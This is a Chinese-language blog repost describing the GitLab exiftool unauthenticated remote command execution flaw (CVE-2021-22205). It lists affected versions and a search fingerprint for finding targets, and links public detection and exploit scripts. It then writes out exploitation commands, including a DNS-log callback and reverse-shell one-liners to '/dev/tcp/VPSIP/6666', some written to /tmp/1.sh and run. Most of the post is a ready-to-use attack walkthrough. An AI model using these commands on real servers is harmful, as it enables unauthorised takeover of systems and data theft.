美文网首页
Gitlab exiftool 远程命令执行漏洞(CVE-202

Gitlab exiftool 远程命令执行漏洞(CVE-202

作者: migrate_ | 来源:发表于2021-12-10 10:15 被阅读0次

    遵纪守法

    任何个人和组织使用网络应当遵守宪法法律,遵守公共秩序,尊重社会公德,不得危害网络安全,不得利用网络从事危害国家安全、荣誉和利益

    0x01 前言

    GitLab 是由GitLab Inc.开发的一个用于仓库管理系统的开源项目,使用Git作为代码管理工具,可通过Web界面访问公开或私人项目。由于GitLab存在未授权的端点,导致该漏洞在无需进行身份验证的情况下即可进行利用。

    0x02 漏洞分析

    未授权的端口在于用户注册:https://xx.xx.xx.xx/users/sign_up

    0x03 影响范围

    11.9 <= Gitlab CE/EE < 13.8.8
    13.9 <= Gitlab CE/EE < 13.9.6
    13.10 <= Gitlab CE/EE < 13.10.3
    

    0x04 目标

     title="GitLab"
    

    0x04 漏洞检测

    需要先安装依赖库

    pip3 install pocsuite3
    
    https://github.com/XTeam-Wing/CVE-2021-22205
    

    下载CVE-2021-22205.py脚本后,将CVE-2021-22205.py脚本放置pocsuite3项目的pocsuite3-master\pocsuite3\pocs目录下

    执行以下命令:

    python3 cli.py -r pocs/CVE-2021-22205.py -u ip:port --verify
    
    1.jpg

    0x04 漏洞利用

    EXP:https://github.com/r0eXpeR/CVE-2021-22205

    python3 CVE-2021-22205.py target "curl \`whoami\`.dnslog"
    
    2.jpg

    命令执行

    python CVE-2021-22205.py -a true -t http://xxxxxxxxx -c "echo 'bash -i >& /dev/tcp/VPSIP/6666 0>&1' > /tmp/1.sh"
    python CVE-2021-22205.py -a true -t http://xxxxxxxxx -c "chmod +x /tmp/1.sh"
    python CVE-2021-22205.py -a true -t http://xxxxxxxxx -c "/bin/bash /tmp/1.sh"
    或者
    python CVE-2021-22205.py -a true -t http://xxxxxxxxx -c "bash -i >& /dev/tcp/xx.xx.xx.xx/6666 0>&1"
    

    相关文章

      网友评论

          本文标题:Gitlab exiftool 远程命令执行漏洞(CVE-202

          本文链接:https://www.haomeiwen.com/subject/nmhcfrtx.html